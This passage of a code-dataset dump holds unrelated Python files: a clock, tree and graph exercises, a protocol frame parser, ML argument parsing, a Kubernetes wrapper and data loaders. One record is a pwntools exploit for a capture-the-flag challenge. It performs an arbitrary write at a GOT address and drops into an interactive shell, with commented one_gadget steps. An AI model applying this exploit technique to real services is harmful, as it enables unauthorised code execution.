'''\r\n 9. Scrieti o functie care sa returneze cel mai mare numar \r\n prim dintr-un sir de caractere dat ca parametru sau -1 daca \r\n sirul de caractere nu contine nici un numar prim. 
Ex: input: \r\n 'ahsfaisd35biaishai23isisvdshcbsi271cidsbfsd97sidsda'; output: 271\r\n '''","sub_path":"PracticaPython/src/lab/LaboratoryI.py","file_name":"LaboratoryI.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"61582117","text":"from pwn import *\n\n#io = process(\"./back\",env={\"LD_PRELOAD\":\"./libc.so.6\"})\n\nio = remote(\"pwn.byteband.it\",8000)\n\nio.sendlineafter(\"size: \",\"500000\")\n#315043\n\nio.sendlineafter(\"idx: \",\"509336\")\n\naddr = 0x601018\nio.recvuntil(\"where: \")\n#gdb.attach(io)\n\nio.sendline(\"6295576\")\n\n#4196310\nio.sendline(\"4195984\")\nio.interactive()\n#io.recvuntil(\"puts: \")\n#puts = int(io.recvline().strip(),16)\n#base = puts - 0x809c0\n#one_gadget = base + 0x10a398\n\n\n#print hex(base)\n\n\n\n#io.sendlineafter(\"size: \",\"500000\")\n#315043\n\n#io.sendafter(\"idx: \",\"1013145\")\n\n#addr = 0x601018\n#io.sendafter(\"where: \",str(6295576))\n#io.send(p64(one_gadget))\n","sub_path":"ByteBandits20/look/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"596097893","text":"import time\r\n\r\n\r\ndef lten(x):\r\n if x < 10:\r\n return \"0\" + str(x)\r\n else:\r\n return x\r\n\r\n\r\nseconds = time.time()\r\n\r\n\r\nhour = 0\r\nminutes = 0\r\n\r\nwhile True:\r\n time.sleep(1)\r\n now = round(time.time() - seconds)\r\n if minutes == 60 and seconds == 60:\r\n minutes += 1\r\n seconds = time.time()\r\n print(str(lten(hour)) + \":\" + str(lten(minutes)) + \":\" + str(lten(0)))\r\n else:\r\n if now == 60:\r\n seconds = time.time()\r\n minutes += 1\r\n print(str(lten(hour)) + \":\" + str(lten(minutes)) + \":\" + str(lten(0)))\r\n else:\r\n print(str(lten(hour)) + \":\" +\r\n str(lten(minutes)) + \":\" + 
str(lten(now)))\r\n","sub_path":"5-eindopdracht/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"338168088","text":"# Binary Tree From Inorder And Preorder\n\n# Problem Description\n# Given preorder and inorder traversal of a tree, construct the binary tree.\n# NOTE: You may assume that duplicates do not exist in the tree.\n\n# Problem Constraints\n# 1 <= number of nodes <= 10^5\n\n# Input Format\n# First argument is an integer array A denoting the preorder traversal of the tree.\n# Second argument is an integer array B denoting the inorder traversal of the tree.\n\n# Output Format\n# Return the root node of the binary tree.\n\n# Example Input\n\n# Input 1:\n# A = [1, 2, 3]\n# B = [2, 1, 3]\n\n# Input 2:\n# A = [1, 6, 2, 3]\n# B = [6, 1, 3, 2]\n\n# Example Output\n\n# Output 1:\n# 1\n# / \\\n# 2 3\n\n# Output 2:\n# 1 \n# / \\\n# 6 2\n# /\n# 3\n\n# Example Explanation\n\n# Explanation 1:\n# Create the binary tree and return the root node of the tree.\n\n# Definition for a binary tree node\n# class TreeNode:\n#\tdef __init__(self, x):\n#\t\tself.val = x\n#\t\tself.left = None\n#\t\tself.right = None\n\nclass Solution:\n\t# @param A : list of integers\n\t# @param B : list of integers\n\t# @return the root node in the tree\n\tdef buildTree(self, A, B):\n\t \n\t if not B:\n\t return\n\t \n\t root_position = B.index(A[0])\n\t tree = TreeNode(A[0])\n\t tree.left = self.buildTree(A[1:root_position+1], B[:root_position])\n\t tree.right = self.buildTree(A[root_position+1:], B[root_position+1:])\n\t \n\t return tree","sub_path":"Trees/Trees-1-HW_BT_from_inorder_and_preorder.py","file_name":"Trees-1-HW_BT_from_inorder_and_preorder.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"257876980","text":"import struct\n\nfrom mx_util import Util\nfrom 
mx_sender import Sender\n\n\n# 接收消息后进行分支处理\nclass Flow:\n\n def __init__(self):\n self.util = Util()\n self.sender = Sender()\n\n def recInfo(self, data):\n self.head = data[0: 16]\n\n self.frameys, \\\n self.len, \\\n self.type, \\\n self.sink, \\\n self.src, \\\n self.time, \\\n self.retransTime, \\\n self.vertifyIndex, \\\n self.cycFrameNo, \\\n self.crcSum \\\n = struct.unpack('3H2cI4c', self.head)\n\n if 0x90eb == hex(self.frameys):\n # 发送帧同步错误帧\n info = struct.pack('BBHL', 0x11, 0, 0, 0)\n self.createMsg(self.src, self.sink, self.type, info, False)\n return\n\n if int(self.len) == len(data):\n # 发送帧长度错误帧\n info = struct.pack('BBHL', 0x22, 0, 0, 0)\n self.createMsg(self.src, self.sink, self.type, info, True)\n return\n\n if not self.checkType(self.src, self.sink, self.type):\n # 发送帧类型错误帧\n info = struct.pack('BBHL', 0x33, 0, 0, 0)\n self.createMsg(self.src, self.sink, self.type, info, False)\n return\n\n if not self.checkSum(data):\n # 发送校验和错误帧\n info = struct.pack('BBHL', 0x11, 0, 0, 0)\n self.createMsg(self.src, self.sink, self.type, info, False)\n return\n\n if self.frameType == 0x0001:\n # 某某消息,并发送回令\n print(\"接收自检消息\")\n\n def checkType(self, src, sink, type):\n if src == b'\\x30':\n print(\"车长软件发送消息\")\n # return False\n elif src == b'\\x11':\n print(\"测发控软件发送消息\")\n elif src == b'\\x51':\n print(\"任务规划软件发送消息\")\n\n if sink != b'\\x51':\n print(\"帧类型错误\")\n return False\n return True\n\n def checkSum(self, data):\n sum = 0\n for i in data:\n sum += i\n if sum == 0:\n return True\n else :\n return False\n\n def createMsg(self, src, sink, type, info, hasReply):\n frameys = 0x90eb\n length = len(info) + 16\n\n # bytes强制转换为int\n src = int.from_bytes(src, byteorder='big', signed=True)\n sink = int.from_bytes(sink, byteorder='big', signed=True)\n\n frameType = self.util.getFrameType(src, sink, type)\n\n # 封装帧头\n head = struct.pack('2HIQ', frameys, length, frameType, 0)\n data = head + info\n\n # 发送消息\n self.sender.senderMsg(data, 
hasReply)","sub_path":"mx_flow.py","file_name":"mx_flow.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"400549489","text":"## SY 20/5/19\n## Reads in power spectra of 100 realisations of estimated kappa for midpoint & optimal estimators.\n## Plots cross-cf error bars (for noisy and noiseless datasets) for input and estimated kappa.\n\nfrom astropy.io import fits\nimport healpy as hp\nimport scipy as sp\nimport numpy as np\nimport pylab as P\nimport kappa_lya\nfrom kappa_lya import *\nimport sys\nfrom collections import OrderedDict\nimport matplotlib.gridspec as gridspec\nfrom matplotlib.offsetbox import AnchoredText\n\ndef rebin(Cls,ellmin=40, ellmax=768, nell=7):\n '''Smooth curves by rebinning Cls'''\n ell = np.arange(Cls.size)\n weights = 2.*ell+1.\n if not ellmin:\n ellmin = min(ell)\n if not ellmax:\n ellmax = max(ell)\n if nell==0:\n nell = ellmax-ellmin\n\n w = (ell>=ellmin)&(ell<=ellmax)\n index = np.floor( (ell[w]-ellmin)*1./(ellmax-ellmin)*nell ).astype(int)\n well = np.bincount( index, weights=weights[w])\n sell = np.bincount( index, weights=weights[w]*ell[w])\n scl = np.bincount( index, weights=weights[w]*Cls[w])\n ell = sell/well\n Cls = scl/well\n \n return ell, Cls, well \n\n\ndef cov(cl, we):\n '''Computes weighted covariance matrix'''\n mcl = (cl*we).sum(axis=0)\n swe = we.sum(axis=0)\n w = swe>0.\n mcl[w] /= swe[w]\n wcl = we*(cl-mcl)\n print(\"Computing cov...\")\n co = wcl.T.dot(wcl)\n sswe = swe*swe[:,None]\n w = sswe>0.\n co[w] /= sswe[w]\n return co\n\ndef get_vals(Cl_crosses_in, Cl_inputs):\n\n ##- Trim off smallest and largest scales (gives 7 bins of ell=104)\n Cl_crosses = Cl_crosses_in[:,40:768]\n\n ##- Rebin\n cross_rebin = []\n cross_weights = []\n\n for i,j in enumerate(Cl_crosses):\n ell, crosses, cross_wei = rebin(Cl_crosses[i])\n cross_rebin.append(crosses)\n cross_weights.append(cross_wei)\n\n cross_cl = np.asarray(cross_rebin)\n 
cross_we = np.asarray(cross_weights)\n cross_mean = (np.sum(cross_cl*cross_we,axis=0) / np.sum(cross_we,axis=0))\n\n input_mean = (np.sum(Cl_inputs, axis=0) / 100)\n\n ##- Calculate covariance matrices, variance and errors\n QW = (cross_cl-cross_mean)*cross_we\n cross_cov = QW.T.dot(QW)/cross_we.T.dot(cross_we)\n cross_var = sp.diagonal(cross_cov)\n cross_stdev = np.sqrt(cross_var)\n #cross_stdev = np.sqrt(cross_var/100)\n\n ##- Calc chi2\n chi2 = np.sum((cross_mean - 0.)**2/cross_stdev**2 )\n\n return ell, cross_mean, cross_stdev, input_mean, chi2\n\n\n##- Open kappa true-correlation files\nkxi = fits.open('kappa-gaussian-true-70-100.fits.gz')[1].data.kappa\nwkxi = fits.open('kappa-gaussian-true-70-100.fits.gz')[1].data.wkappa\nkxi_input = fits.open('est_maps_noiseless/kappa_input1.fits')[1].data.I\n\n##- Get resolution of map\nnside=int(hp.npix2nside(kxi.size))\n\n##- Mask off areas outside DESI footprint\nmask = wkxi!=0\nmask &= (kxi>np.percentile(kxi[mask], 0.5)) & \\\n (kxi 0:\n job.append(shard[end:])\n\n # parallelly run them\n output = p.map(featurize_shard, job)\n\n # reunion the result\n shard_X, shard_L = [], []\n for piece in output:\n shard_X += piece[0]\n shard_L += piece[1]\n\n else:\n shard_X, shard_L = featurize_shard(shard)\n\n padded_X, padded_L = [], []\n size_x = []\n for x, l in zip(shard_X, shard_L):\n paded_x = np.lib.pad(x,\n ((0, MAX_NUM_POINT - x.shape[0]), (0, 0)),\n 'constant',\n constant_values=(-1, -1))\n paded_l = np.lib.pad(l,\n ((0, MAX_NUM_POINT - l.shape[0]), (0, MAX_NUM_POINT - l.shape[1])),\n 'constant',\n constant_values=(-1, -1))\n\n padded_X.append(paded_x)\n padded_L.append(paded_l)\n size_x.append(x.shape[0])\n\n padded_X = np.stack(padded_X).astype(np.float32)\n padded_L = np.stack(padded_L).astype(np.float32)\n size_x = np.squeeze(np.stack(size_x)).astype(np.int32)\n\n basename = \"shard_{}\".format(shard_num)\n \"\"\"save to local\"\"\"\n metadata_rows.append(write_data_to_disk(train_dir,\n basename,\n padded_X,\n 
shard_y,\n padded_L,\n size_x,\n shard_name,\n shard_nodes))\n\n \"\"\" add up to list\"\"\"\n all_X.append(padded_X)\n all_L.append(padded_L)\n all_y.append(shard_y)\n all_names += shard_name\n all_size_x.append(size_x)\n all_node_img += shard_nodes\n\n \"\"\" return a Dataset contains all X, y, w, ids\"\"\"\n all_X = np.squeeze(np.vstack(all_X))\n all_L = np.squeeze(np.vstack(all_L))\n all_y = np.squeeze(np.concatenate(all_y)).astype(np.int32)\n all_size_x = np.squeeze(np.concatenate(all_size_x)).astype(np.int32)\n\n # \"pad X and L\"\n # max_atom_train = find_max_atom(all_L)\n # max_atom = max_atom_train\n\n \"\"\" save the meta data to local \"\"\"\n meta_data1 = list()\n meta_data1.append(metadata_rows)\n meta_data1.append(MAX_NUM_POINT)\n with open(os.path.join(train_dir, 'meta.pkl'), 'wb') as f:\n pickle.dump(meta_data1, f)\n\n # train_num = int(padded_X.shape[0] * 0.5)\n\n # create output dataset\n train_dataset = dict()\n train_dataset['X'] = all_X\n train_dataset['y'] = all_y\n train_dataset['names'] = all_names\n train_dataset['L'] = all_L\n train_dataset['size'] = all_size_x\n\n print(\"Loading and Processing Testing Data......\")\n metadata_rows = []\n all_X, all_y, all_L, all_names, all_size_x, all_node_img = [], [], [], [], [], []\n for shard_num, (shard, shard_y, shard_name, shard_nodes) in enumerate(get_shards([],\n TEST_FILES_GBM,\n shard_size,\n False)):\n \"\"\"shard is ndarray of 3D mesh point 3-dimension, [pc_id, point_id, (x,y,z)]\n y is the class id for each sample (3D mesh), int type\n \"\"\"\n print('Featurizing Testing Data , Shard - %d' % shard_num)\n if parallel:\n # split jobs into pieces\n num_process = 8\n size_piece = int(len(shard) // num_process)\n job = []\n for id_pieces in range(num_process):\n start = id_pieces * size_piece\n end = (id_pieces + 1) * size_piece\n job.append(shard[start: end])\n if len(shard[end:]) > 0:\n job.append(shard[end:])\n # parallelly run them\n output = p.map(featurize_shard, job)\n\n # reunion the 
result\n shard_X, shard_L = [], []\n for piece in output:\n shard_X += piece[0]\n shard_L += piece[1]\n else:\n shard_X, shard_L = featurize_shard(shard)\n\n padded_X, padded_L = [], []\n size_x = []\n for x, l in zip(shard_X, shard_L):\n paded_x = np.lib.pad(x,\n ((0, MAX_NUM_POINT - x.shape[0]), (0, 0)),\n 'constant',\n constant_values=(-1, -1))\n paded_l = np.lib.pad(l,\n ((0, MAX_NUM_POINT - l.shape[0]), (0, MAX_NUM_POINT - l.shape[1])),\n 'constant',\n constant_values=(-1, -1))\n\n padded_X.append(paded_x)\n padded_L.append(paded_l)\n size_x.append(x.shape[0])\n\n padded_X = np.stack(padded_X).astype(np.float32)\n padded_L = np.stack(padded_L).astype(np.float32)\n size_x = np.squeeze(np.stack(size_x)).astype(np.int32)\n\n basename = \"shard_{}\".format(shard_num)\n \"\"\"save to local\"\"\"\n metadata_rows.append(write_data_to_disk(test_dir,\n basename,\n padded_X,\n shard_y,\n padded_L,\n size_x,\n shard_name,\n shard_nodes))\n\n \"\"\" add up to list\"\"\"\n all_X.append(padded_X)\n all_L.append(padded_L)\n all_y.append(shard_y)\n all_names += shard_name\n all_size_x.append(size_x)\n all_node_img += shard_nodes\n\n \"create label array\"\n all_X = np.squeeze(np.vstack(all_X))\n all_L = np.squeeze(np.vstack(all_L))\n all_y = np.squeeze(np.concatenate(all_y)).astype(np.int32)\n all_size_x = np.squeeze(np.concatenate(all_size_x)).astype(np.int32)\n\n # \"pad X and L\"\n # max_atom_test = find_max_atom(all_L)\n # max_atom = max(max_atom_test, max_atom_train)\n\n \"\"\" save the meta data to local \"\"\"\n meta_data2 = list()\n meta_data2.append(metadata_rows)\n meta_data2.append(MAX_NUM_POINT)\n with open(os.path.join(test_dir, 'meta.pkl'), 'wb') as f:\n pickle.dump(meta_data2, f)\n\n \"\"\" return a Dataset contains all X, y, w, ids\"\"\"\n # create output dataset\n test_dataset = dict()\n test_dataset['X'] = all_X\n test_dataset['y'] = all_y\n test_dataset['names'] = all_names\n test_dataset['L'] = all_L\n test_dataset['size'] = all_size_x\n\n return 
train_dataset, test_dataset, MAX_NUM_POINT\n\n\ndef write_data_to_disk(\n data_dir,\n basename,\n X,\n y,\n L,\n size,\n names,\n node_img):\n \"\"\"\n Write data to local as joblib format\n\n \"\"\"\n out_X = \"%s-X.joblib\" % basename\n io_utils.save_to_disk(X, os.path.join(data_dir, out_X))\n\n out_y = \"%s-y.joblib\" % basename\n io_utils.save_to_disk(y, os.path.join(data_dir, out_y))\n\n out_L = \"%s-L.joblib\" % basename\n io_utils.save_to_disk(L, os.path.join(data_dir, out_L))\n\n out_size = \"%s-size.joblib\" % basename\n io_utils.save_to_disk(size, os.path.join(data_dir, out_size))\n\n out_names = \"%s-name.joblib\" % basename\n io_utils.save_to_disk(names, os.path.join(data_dir, out_names))\n\n out_node_img = \"%s-node_img.joblib\" % basename\n io_utils.save_to_disk(node_img, os.path.join(data_dir, out_node_img))\n\n # note that this corresponds to the _construct_metadata column order\n return {'basename': basename, 'X': out_X,\n 'y': out_y, 'name': out_names,\n 'L': out_L, 'size': out_size,\n 'node_img': out_node_img}\n\n\ndef get_shards(data_dir, file_list, shard_size, istraining):\n\n \"\"\" shuffle the data files\"\"\"\n file_idxs = np.arange(0, len(file_list))\n np.random.shuffle(file_idxs) # randomly extract data from files\n\n shard_num = len(file_list) // shard_size\n\n for shard_idx in range(shard_num):\n\n start_idx = shard_idx * shard_size\n end_idx = (shard_idx + 1) * shard_size\n shard_files_idxs = file_idxs[start_idx: end_idx]\n\n all_data, all_label, all_names, all_node_img = [], [], [], []\n for fn in shard_files_idxs:\n\n if not data_dir:\n raw_data = np.load(file_list[fn])\n else:\n raw_data = np.load(os.path.join(data_dir, file_list[fn]))\n\n current_data = raw_data['vgg_features']\n node_img_path = raw_data['img_path']\n # pid = raw_data['pid']\n # time = raw_data['time']\n if len(current_data) < MIN_NUM_POINT:\n # skip WSI of too few patches\n continue\n\n # if len(current_data) > MAX_NUM_POINT:\n # continue\n\n curr_path = 
file_list[fn]\n\n curr_type = curr_path.split('/')[-4]\n curr_filename = curr_path.split('/')[-1]\n\n if curr_type == 'LUAD':\n # LUAD -> class 0, LUSC -> class 1\n current_label = 0\n else:\n current_label = 1\n\n # if istraining:\n \"random select at most MAX_NUM_POINT nodes for WSI\"\n list_node_idx = np.arange(0, current_data.shape[0])\n np.random.shuffle(list_node_idx)\n sel_ids = list_node_idx[0: MAX_NUM_POINT]\n\n current_data = current_data[sel_ids]\n current_data = np.expand_dims(current_data, 0)\n node_img_path = node_img_path[sel_ids]\n\n all_data.append(current_data)\n all_label.append(current_label)\n all_names.append(curr_filename)\n all_node_img.append(node_img_path)\n\n \"\"\" create numpy for all data and label\"\"\"\n all_label = np.squeeze(np.hstack(all_label))\n\n yield all_data, all_label, all_names, all_node_img\n\n\ndef find_max_atom(dataset):\n # find the maximum atom number in whole datasests\n max_n = 0\n for elm in dataset:\n max_n = max(elm.shape[0], max_n)\n return max_n\n\n\ndef featurize_shard(shard):\n\n \"\"\"\n convert ndarray (n-sample, n_point of sample, 3-d)\n :param shard: ndarray, point cloud raw data\n :return: graph object for each sample\n \"\"\"\n X = [] # to save the graph object\n L = []\n n_samples = len(shard)\n for idx in range(n_samples):\n print(\"processing sample %s\\n\" % str(idx))\n # iterate each pc in shard\n P = np.squeeze(np.array(shard[idx]))\n\n # do not need a clustering, use original points\n node_features = P\n adj_list, adj_matrix = gl.get_adjacency(node_features)\n Laplacian = gl.compute_laplacian(adj_list, normalized=False)\n X.append(node_features)\n L.append(Laplacian)\n\n return X, L\n\n\ndef load_back_from_disk(data_dir, istrain=True):\n \"\"\"\n load data backas Train/test from disk\n :return: Train/Test STDiskDataset\n \"\"\"\n \"\"\"load back metadata_df\"\"\"\n meta_data = pickle.load(open(os.path.join(data_dir, 'meta.pkl'), 'rb'))\n metadata_rows = meta_data[0]\n max_node = meta_data[1]\n\n 
\"\"\"itershard by loading from disk\"\"\"\n all_X, all_y, all_size, all_L, all_names, all_node_img = [], [], [], [], [], []\n\n for _, row in enumerate(metadata_rows):\n X = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['X'])))\n L = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['L'])))\n y = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['y'])))\n size = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['size'])))\n names = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['name'])))\n node_img = np.array(io_utils.load_from_disk(os.path.join(data_dir, row['node_img'])))\n\n \"\"\" stack to list\"\"\"\n all_X.append(X)\n all_y.append(y)\n all_L.append(L)\n all_size.append(size)\n all_names.append(names)\n all_node_img.append(node_img)\n\n \"\"\" return a Dataset contains all X, y, w, ids\"\"\"\n all_X = np.squeeze(np.vstack(all_X))\n all_L = np.squeeze(np.vstack(all_L))\n all_y = np.squeeze(np.concatenate(all_y))\n all_size = np.squeeze(np.concatenate(all_size))\n all_names = np.squeeze(np.concatenate(all_names))\n all_node_img = np.squeeze(np.concatenate(all_node_img))\n\n # create output dataset\n dataset = dict()\n if istrain:\n dataset['X'] = all_X[:TRAIN_NUM]\n dataset['y'] = all_y[:TRAIN_NUM]\n dataset['size'] = all_size[:TRAIN_NUM]\n dataset['L'] = all_L[:TRAIN_NUM]\n dataset['name'] = all_names[:TRAIN_NUM]\n dataset['node_img'] = all_node_img[:TRAIN_NUM]\n else:\n dataset['X'] = all_X[:TEST_NUM]\n dataset['y'] = all_y[:TEST_NUM]\n dataset['size'] = all_size[:TEST_NUM]\n dataset['L'] = all_L[:TEST_NUM]\n dataset['name'] = all_names[:TEST_NUM]\n dataset['node_img'] = all_node_img[:TEST_NUM]\n\n return dataset, max_node\n\n\ndef load(dataset_name='processed_500maxnode'):\n\n \"\"\"Load chemical datasets. 
Raw data is given as SMILES format\"\"\"\n # data_dir = os.path.join('../data/modelnet40_ply_hdf5_2048')\n # assert os.path.exists(data_dir)\n\n processed_data_dir = os.path.join(DATA_DIR, dataset_name)\n if not os.path.exists(processed_data_dir):\n os.makedirs(processed_data_dir)\n\n if len(os.listdir(processed_data_dir)) != 0:\n\n # print(\"Loading Saved Data from Disk.......\")\n\n \"\"\" pre-defined location for saving the train and test data\"\"\"\n train_dir = os.path.join(processed_data_dir, 'train')\n test_dir = os.path.join(processed_data_dir, 'test')\n\n train, max_node = load_back_from_disk(data_dir=train_dir, istrain=True)\n test, max_node_test = load_back_from_disk(data_dir=test_dir, istrain=False)\n max_node = max(max_node, max_node_test)\n\n else:\n train, test, max_node = featurize(\n processed_data_dir,\n shard_size=16)\n\n return train, test, max_node\n\n\ndef main():\n load('processed_{}maxnode'.format(MAX_NUM_POINT))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"utils/WSI_GBM_loader.py","file_name":"WSI_GBM_loader.py","file_ext":"py","file_size_in_byte":17209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"166141789","text":"# https://www.hackerearth.com/practice/algorithms/graphs/shortest-path-algorithms/practice-problems/algorithm/shortest-path-revisited-9e1091ea/\n# https://bradfieldcs.com/algos/graphs/dijkstras-algorithm/\nimport heapq\nfrom collections import defaultdict\n\n# Graph is stored here. \ngraph = defaultdict(list)\n\n# Stores path from start node to all other nodes, initialized to inf initially. 
\nres = {}\n\ndef shortest_path(start_node):\n seen = set()\n heap = []\n res[start_node] = (0, 0, None) \n heapq.heappush(heap, (0, start_node))\n while heap:\n # Lets check nodes of this node.\n currVal, v = heapq.heappop(heap)\n if v not in seen:\n for neighbour, value in graph[v]:\n if currVal + value < res[neighbour][0]:\n # Path weight, edge weight, parent node\n res[neighbour] = (currVal + value, value, v)\n heapq.heappush(heap, (currVal+value, neighbour)) \n seen.add(v)\n\n# finds path from every node to start_node if possible. \ndef findPath(res, start_node):\n paths = defaultdict(list)\n for node in res.keys():\n curr_node, edge_val, parent = res[node]\n while parent != None:\n paths[node].append(edge_val)\n _, edge_val, parent = res[parent]\n return paths\n\n\nif __name__ == \"__main__\":\n # n = vertices, m = edges\n n, m, free_tickets = map(int, input().split())\n for i in range(m):\n try:\n a, b, value = map(int, input().split())\n graph[a].append((b, value))\n graph[b].append((a, value))\n except:\n break\n # We also store (distance from source, parent)\n res = {k:(float('inf'), None, None) for k in range(1, n+1)}\n shortest_path(1)\n paths = findPath(res, start_node=1)\n ans = list(paths.values())\n print(ans)\n # Reverse this path arrays \n new_ans = [sorted(arr, reverse=True) for arr in ans]\n print(new_ans)\n # ans = list(res.values())\n # del ans[0]\n # print(*ans)\n# print(graph)\nprint(res)\n\n\n","sub_path":"hackerearth/shortest_path_path.py","file_name":"shortest_path_path.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"54607173","text":"from unittest import TestCase\n\nfrom test.common import *\n\nfrom main.common.util.file_util import FileUtil\nfrom main.data.giga_world import GigaWorldDataLoader\n\n\nclass TestDataLoader(TestCase):\n\n def test(self):\n dataloader = GigaWorldDataLoader(\n 
FileUtil.get_file_path(conf('train:article-file')),\n FileUtil.get_file_path(conf('train:summary-file')), 15)\n\n counter = 0\n while True:\n batch = dataloader.next_batch()\n if batch is None:\n break\n\n counter += len(batch)\n\n print(counter)\n\n print(batch)\n\n\n\n\n\n\n\n\n","sub_path":"test/test_dataLoader.py","file_name":"test_dataLoader.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"487622322","text":"import logging\nimport subprocess\nfrom typing import List\n\nlogger = logging.getLogger(__name__)\n\n\nclass KubernetesClient:\n def __execute(self, args: List[str]) -> subprocess.CompletedProcess:\n command = ' '.join(args)\n logger.debug(f'Executing kubectl command: {command}')\n\n return subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)\n\n def create(self, name: str, type: str, args: List[str] = []) -> bool:\n args = ['kubectl', 'create', type, name] + args\n process = self.__execute(args)\n\n if f'{type}/{name} created' in process.stdout:\n return True\n\n if (\n f'Error from server (AlreadyExists): {type}s \"{name}\" already exists' in process.stderr\n or f'Error from server (AlreadyExists): {type} \"{name}\" already exists' in process.stderr\n ):\n return True\n\n logger.debug(f'kubectl failed to create {type} {name}')\n logger.debug(f'kubectl create stdout: {process.stdout}')\n logger.debug(f'kubectl create stderr: {process.stderr}')\n\n return False\n\n def delete(self, name: str, type: str, args: List[str] = []) -> bool:\n args = ['kubectl', 'delete', type, name] + args\n process = self.__execute(args)\n\n if f'{type} \"{name}\" deleted' in process.stdout:\n return True\n\n if (\n f'Error from server (NotFound): {type}s \"{name}\" not found' in process.stderr\n or f'Error from server (NotFound): {type} \"{name}\" not found' in process.stderr\n ):\n return True\n\n logger.debug(f'kubectl failed to delete {type} 
{name}')\n logger.debug(f'kubectl delete stdout: {process.stdout}')\n logger.debug(f'kubectl delete stderr: {process.stderr}')\n\n return False\n","sub_path":"server/kubernetes_client.py","file_name":"kubernetes_client.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"202372252","text":"# coding: utf-8\r\n\r\n# Developer : Jeong Wooyoung\r\n# Contact : gunyoung20@naver.com\r\n\r\nimport argparse\r\nimport os\r\n\r\n#########################################################################################################\r\n### initialize parameter ################################################################################\r\ndef parse_args(model_name = 'LSTM', results_path=os.getcwd()+'/results/'):\r\n\r\n desc = \"Tensorflow implementation of 'LSTM'\"\r\n parser = argparse.ArgumentParser(description=desc)\r\n\r\n # Data parameter ##############################################################################################\r\n parser.add_argument('--quantilize', type=bool, default=True, help='Boolean for choosing quantilize or not')\r\n parser.add_argument('--n_quantilize', type=int, default=10, help='Number of quantilizations')\r\n\r\n # Learning parameter ##########################################################################################\r\n parser.add_argument('--model_name', type=str, default=model_name,\r\n choices=['Bidirectional_LSTM', 'CNN', 'ResNet', 'AlexNet', 'VGG', 'LSTM'],\r\n help='ML train model name\\n')\r\n parser.add_argument('--model_path', type=str, default=results_path+model_name+'/models', help='File path of output images')\r\n parser.add_argument('--results_path', type=str, default=results_path+model_name+'/', help='File path of output images')\r\n parser.add_argument('--file_cnt', type=int, default=4, help='Number of data files')\r\n\r\n parser.add_argument('--keep_prob_cell', type=float, default=.9, help='rate dropout cell')\r\n 
parser.add_argument('--keep_prob_layer', type=float, default=.9, help='rate dropout layer')\r\n\r\n parser.add_argument('--n_layers', type=int, default=2, help='Number of hidden layers')\r\n\r\n parser.add_argument('--n_hidden', type=int, default=50, help='Number of hidden units')\r\n\r\n parser.add_argument('--learning_rate', type=float, default=1e-4, help='Learning rate for Adam optimizer')\r\n\r\n parser.add_argument('--num_epochs', type=int, default=1000, help='The number of epochs to run')\r\n\r\n parser.add_argument('--batch_size', type=int, default=100, help='Batch size')\r\n parser.add_argument('--output_size', type=int, default=1, help='Output size')\r\n\r\n args = parser.parse_args()\r\n print(args)\r\n return check_args(args)\r\n\r\n\"\"\"checking arguments\"\"\"\r\ndef check_args(args):\r\n\r\n # --results_path\r\n try:\r\n\r\n os.makedirs(args.results_path)\r\n except(FileExistsError):\r\n pass\r\n # delete all existing files\r\n # files = glob.glob(args.results_path+'/*')\r\n # for f in files:\r\n # os.remove(f)\r\n\r\n # --n_hidden\r\n try:\r\n assert args.n_hidden >= 1\r\n except:\r\n print('number of hidden units must be larger than one')\r\n\r\n # --learn_rate\r\n try:\r\n assert args.learn_rate > 0\r\n except:\r\n print('learning rate must be positive')\r\n\r\n # --num_epochs\r\n try:\r\n assert args.num_epochs >= 1\r\n except:\r\n print('number of epochs must be larger than or equal to one')\r\n\r\n # --batch_size\r\n try:\r\n assert args.batch_size >= 1\r\n except:\r\n print('batch size must be larger than or equal to one')\r\n\r\n return args","sub_path":"ELMO/knowledge_based_sentiment_analysis/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"572288394","text":"from flask import jsonify, make_response\n\nsurveys = [{\n \"id\": \"cb0711c3-0ac8-41d3-ae0e-567e5ea1ef87\",\n \"longName\": \"Business Register and 
